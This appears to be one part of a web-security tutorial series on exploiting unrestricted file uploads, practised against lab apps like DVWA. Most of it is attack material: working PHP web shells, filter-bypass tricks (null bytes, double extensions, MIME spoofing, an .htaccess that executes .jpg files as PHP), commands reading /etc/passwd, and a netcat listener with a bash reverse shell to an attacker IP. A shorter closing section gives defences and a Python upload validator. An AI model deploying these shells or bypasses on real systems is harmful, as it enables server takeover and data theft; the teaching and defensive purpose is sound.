Introduction
File upload features are common in web apps: think profile pictures, documents, resumes.
But when poorly secured, these features let attackers upload:
Malware
PHP web shells
Reverse shell scripts
Persistent backdoors
In this part, you’ll learn how to:
Find insecure upload forms
Bypass file filters
Deploy and trigger a web shell
What Is an Unrestricted File Upload?
It's when a web app allows users to:
Upload any file type
Rename extensions (e.g. .php instead of .jpg)
Execute scripts from the upload directory
This leads to Remote Code Execution (RCE): attackers can fully control the server.
Detecting a Vulnerable Upload
Red flags:
Accepts any file extension (.php, .exe, .sh)
Upload folder is public (/uploads/filename.php)
No MIME or content validation
Error messages during upload leak info
Practice with DVWA / bWAPP
1. Try uploading a .php file:
<?php echo shell_exec($_GET['cmd']); ?>
2. Visit:
http://localhost/dvwa/uploads/shell.php?cmd=whoami
You should see the command output, which is proof of RCE.
Upload Filter Bypass Techniques
Obfuscation:
Rename .php to .php.jpg
Use .ph%00p (null byte injection)
Upload .htaccess to enable script execution
MIME Type Spoofing:
Intercept request in Burp
Change Content-Type: image/jpeg for a .php file
Double Extension Trick:
shell.php;.jpg
shell.php%20
Rename with HTAccess (Apache only)
Upload .htaccess with:
SetHandler application/x-httpd-php
AddType application/x-httpd-php .jpg
Now .jpg files are executed as PHP.
Deploying a Web Shell
Popular PHP shell scripts:
<?php system($_GET['cmd']); ?>
Or use:
<?php passthru($_REQUEST['cmd']); ?>
Access like:
/uploads/shell.php?cmd=ls
/uploads/shell.php?cmd=cat /etc/passwd
Reverse Shell (Advanced)
1. Set up listener:
nc -lvnp 4444
2. Upload and trigger shell:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR-IP/4444 0>&1'"); ?>
3. Trigger in browser:
/uploads/shell.php
Boom, your terminal lights up with a shell.
How to Prevent File Upload Exploits
From the defender's side:
Don't allow .php, .exe, .sh, .js, etc.
Use strict whitelisting (.jpg, .png, .pdf)
Rename files on upload and store them outside web root
Verify MIME types and scan uploaded files
Never allow uploads to executable folders
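The defender-side checks listed above, combined into one server-side validation routine. This is an added example, not code from the original post; the names `validate_upload`, `store_upload` and `UploadRejected`, the magic-byte table and the `private_dir` parameter are assumptions chosen for illustration.

```python
import os
import secrets

# Allowlist from the post (.jpg, .png, .pdf), each tied to its leading magic bytes.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".pdf": (b"%PDF-",),
}


class UploadRejected(ValueError):
    """Hypothetical error type: the upload failed validation."""


def validate_upload(client_name: str, content: bytes) -> str:
    """Return a server-generated storage name, or raise UploadRejected."""
    # Keep only the last path component; clients may send full paths.
    name = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    # Reject (do not strip) NUL/control bytes, ';', '%' and trailing space/dot:
    # this covers .ph%00p, shell.php;.jpg and shell.php%20, decoded or not.
    if any(ord(c) < 0x20 or c in ";%" for c in name) or name != name.rstrip(" ."):
        raise UploadRejected("illegal characters in file name")
    if name.startswith("."):
        raise UploadRejected("dotfiles such as .htaccess are not accepted")
    stem, ext = os.path.splitext(name.lower())
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} is not on the allowlist")
    if "." in stem:  # shell.php.jpg leaves a second extension in the stem
        raise UploadRejected("multiple extensions")
    # Ignore the client-supplied Content-Type; check the bytes themselves.
    if not content.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    return secrets.token_hex(16) + ext  # never reuse the client's name on disk


def store_upload(private_dir: str, client_name: str, content: bytes) -> str:
    """Validate, then write under the random name with no execute bits.

    private_dir is assumed to be a directory outside the web root.
    """
    path = os.path.join(private_dir, validate_upload(client_name, content))
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    return path
```

A matching header does not prove the rest of the file is harmless, so the stored file should still be served from a location where the web server never executes scripts.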
Quick Checklist
| Vulnerability | Risk |
|---|---|
| No extension filtering | PHP upload & exec |
| No MIME type check | Bypass via spoof |
| Public uploads folder | Easy access to shell |
| .htaccess override | Execute disguised scripts |
Wrapping Up
File upload bugs are often missed, but a single upload can mean total system takeover.
You now know:
How to detect upload flaws
Bypass filters
Deploy web shells and reverse shells
How to defend your own upload systems
Next up:
Part 8: Broken Authentication & Session Hijacking
We’ll cover how attackers exploit weak login systems to hijack accounts and impersonate users.
